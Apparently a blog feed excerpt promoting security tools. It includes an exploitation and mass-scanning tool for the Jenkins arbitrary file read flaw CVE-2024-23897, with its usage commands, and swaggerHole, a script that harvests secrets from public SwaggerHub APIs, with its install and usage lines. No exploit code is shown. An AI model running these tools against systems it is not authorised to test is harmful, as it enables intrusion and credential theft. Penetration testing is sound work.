BackDoorSim">Download BackDoorSim</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-5651848469322305022024-02-25T08:30:00.004-03:002024-02-25T08:30:00.155-03:00CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi2ujWgI-O8XhSDEW0GKqe34k767hx6qkhb75LEchmxfueorSZJchGkvtr6i3N6sWi2UBcSUwXC5YJg6FMScmxBFv58uPGkI9kYXZqbm-1fjnmjP-9MQmRRsOuCooses0JgzkXaH2BhtC9OOSgnDiXnrhtOrC5UOyN2SGEJd5QyIkhGrc-rjS3Qi9WJPMI9"><img alt="" border="0" height="278" id="BLOGGER_PHOTO_ID_7337929743698788354" src="https://blogger.googleusercontent.com/img/a/AVvXsEi2ujWgI-O8XhSDEW0GKqe34k767hx6qkhb75LEchmxfueorSZJchGkvtr6i3N6sWi2UBcSUwXC5YJg6FMScmxBFv58uPGkI9kYXZqbm-1fjnmjP-9MQmRRsOuCooses0JgzkXaH2BhtC9OOSgnDiXnrhtOrC5UOyN2SGEJd5QyIkhGrc-rjS3Qi9WJPMI9=w640-h278" width="640" /></a></p><br /> <p>Exploitation and <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> tool specifically designed for Jenkins versions <code><= 2.441 & <= LTS 2.426.2</code>. It leverages <code>CVE-2024-23897</code> to assess and exploit <a href="https://www.kitploit.com/search/label/vulnerabilities" target="_blank" title="vulnerabilities">vulnerabilities</a> in Jenkins instances. </p> <span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>Usage</b></span><br /> <p>Ensure you have the necessary permissions to <a href="https://www.kitploit.com/search/label/Scan" target="_blank" title="scan">scan</a> and exploit the target systems. Use this tool responsibly and ethically.</p> <pre><code>python CVE-2024-23897.py -t <target> -p <port> -f <file><br /></code></pre> <p>or</p> <pre><code>python CVE-2024-23897.py -i <input_file> -f <file><br /></code></pre> <p><strong>Parameters:</strong> - <code>-t</code> or <code>--target</code>: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or <a href="https://www.kitploit.com/search/label/CIDR" target="_blank" title="CIDR">CIDR</a> block. - <code>-i</code> or <code>--input-file</code>: Path to input file containing hosts in the format of <code>http://1.2.3.4:8080/</code> (one per line). - <code>-o</code> or <code>--output-file</code>: Export results to file (optional). - <code>-p</code> or <code>--port</code>: Specify the port number. Default is 8080 (optional). - <code>-f</code> or <code>--file</code>: Specify the file to read on the target system.</p> <br /><span style="font-size: large;"><b>Changelog</b></span><br /> <br /><b>[27th January 2024] - Feature Request</b><br /> <ul> <li>Added scanning/exploiting via input file with hosts (<code>-i INPUT_FILE</code>). </li> <li>Added export to file (<code>-o OUTPUT_FILE</code>).</li> </ul> <br /><b>[26th January 2024] - Initial Release</b><br /> <ul> <li>Initial release.</li> </ul> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.</p> <br /><span style="font-size: large;"><b>Author</b></span><br /> <p><strong>Alexander Hagenah</strong> - <a href="https://primepage.de" rel="nofollow" target="_blank" title="URL">URL</a> - <a href="https://twitter.com/xaitax" rel="nofollow" target="_blank" title="Twitter">Twitter</a></p> <br /><span style="font-size: large;"><b>Disclaimer</b></span><br /> <p>This tool is meant for educational and professional purposes only. Unauthorized scanning and <a href="https://www.kitploit.com/search/label/Exploiting" target="_blank" title="exploiting">exploiting</a> of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/xaitax/CVE-2024-23897" rel="nofollow" target="_blank" title="Download CVE-2024-23897">Download CVE-2024-23897</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-70233308256489761692024-02-24T08:30:00.001-03:002024-02-24T08:30:00.128-03:00swaggerHole - A Python3 Script Searching For Secret On Swaggerhub<p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgRljQyFcgTZb4QTUQAXiP9eyW_Fekzx2kyra3RU1VavN4YnL6zw4rNwfeZnizpu6kduRsMj2JcgySp-UuMDoxok-6vBpNlpU4gea4gmMI7cdXGxPQ8EvKjXjpqX9Awz3WGQsAU5OctKJ7iJwfi0AczjKJ-h92AKkwZJrxcxU-1Wr3ui1-ITAGicwPyjc53"><img alt="" border="0" height="470" id="BLOGGER_PHOTO_ID_7338562964720588994" src="https://blogger.googleusercontent.com/img/a/AVvXsEgRljQyFcgTZb4QTUQAXiP9eyW_Fekzx2kyra3RU1VavN4YnL6zw4rNwfeZnizpu6kduRsMj2JcgySp-UuMDoxok-6vBpNlpU4gea4gmMI7cdXGxPQ8EvKjXjpqX9Awz3WGQsAU5OctKJ7iJwfi0AczjKJ-h92AKkwZJrxcxU-1Wr3ui1-ITAGicwPyjc53=w640-h470" width="640" /></a> </p><p align="center"><br /></p><h2 style="text-align: left;">Introduction </h2><div><div>This tool is made to automate the process of retrieving <a href="https://www.kitploit.com/search/label/Secrets" target="_blank" title="secrets">secrets</a> in the public APIs on [swaggerHub](https://app.swaggerhub.com/search). This tool is <a href="https://www.kitploit.com/search/label/multithreaded" target="_blank" title="multithreaded">multithreaded</a> and pipe mode is available :) </div><span><a name='more'></a></span><div><br /></div><h2 style="text-align: left;">Requirements </h2><div> - python3 (sudo apt install python3) - pip3 (sudo apt install python3-pip) ## Installation <pre><code>pip3 install swaggerhole<br /></code></pre> or <a href="https://www.kitploit.com/search/label/Cloning" target="_blank" title="cloning">cloning</a> this repository and running <pre><code>git clone https://github.com/Liodeus/swaggerHole.git<br />pip3 install .<br /></code></pre><div><br /></div><h2 style="text-align: left;"> Usage </h2><pre><code> _____ _ __ ____ _ ____ _ ____ _ ___ _____<br /> / ___/| | /| / // __ `// __ `// __ `// _ \ / ___/<br /> (__ ) | |/ |/ // /_/ // /_/ // /_/ // __// / <br />/____/ |__/|__/ \__,_/ \__, / \__, / \___//_/ <br /> __ __ __ /____/ /____/ <br /> / / / /____ / /___ <br /> / /_/ // __ \ / // _ \ <br /> / __ // /_/ // // __/ <br />/_/ /_/ \____//_/ \___/ <br /><br />usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -s SEARCH, --search SEARCH<br /> Term to search<br /> -o OUT, --out OUT Output directory<br /> -t THREADS, --threads THREADS<br /> Threads number (Default 25)<br /> -j, --json Json ouput<br /> -q, --quiet Remove banner<br /> -du, --deactivate_url<br /> Deactivate the URL filtering<br /> -de, --deactivate_email<br /> Deactivate the <a href="https://www.kitploit.com/search/label/Email" target="_blank" title="email">email</a> filtering<br /></code></pre><div><br /></div><h3 style="text-align: left;">Search for secret about a domain </h3><pre><code>swaggerHole -s test.com<br /><br />echo test.com | swaggerHole<br /></code></pre><h3 style="text-align: left;">Search for secret about a domain and output to json </h3><pre><code>swaggerHole -s test.com --json<br /><br />echo test.com | swaggerHole --json<br /></code></pre><h3 style="text-align: left;">Search for secret about a domain and do it fast :) </h3><pre><code>swaggerHole -s test.com -t 100<br /><br />echo test.com | swaggerHole -t 100<br /></code></pre><div><br /></div><h2 style="text-align: left;">Output explanation</h2></div><h3 style="text-align: left;">Normal output</h3><div> `Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]` </div><h3 style="text-align: left;">Json output</h3><div> `{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}` </div><h3 style="text-align: left;">Deactivate url/email </h3><div>Using -du or -de remove the filtering done by the tool. There is more false positive with those options. </div><div><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Liodeus/swaggerHole" rel="nofollow" target="_blank" title="Download swaggerHole">Download swaggerHole</a></span></b></div></div></div>Unknownnoreply@blogger.com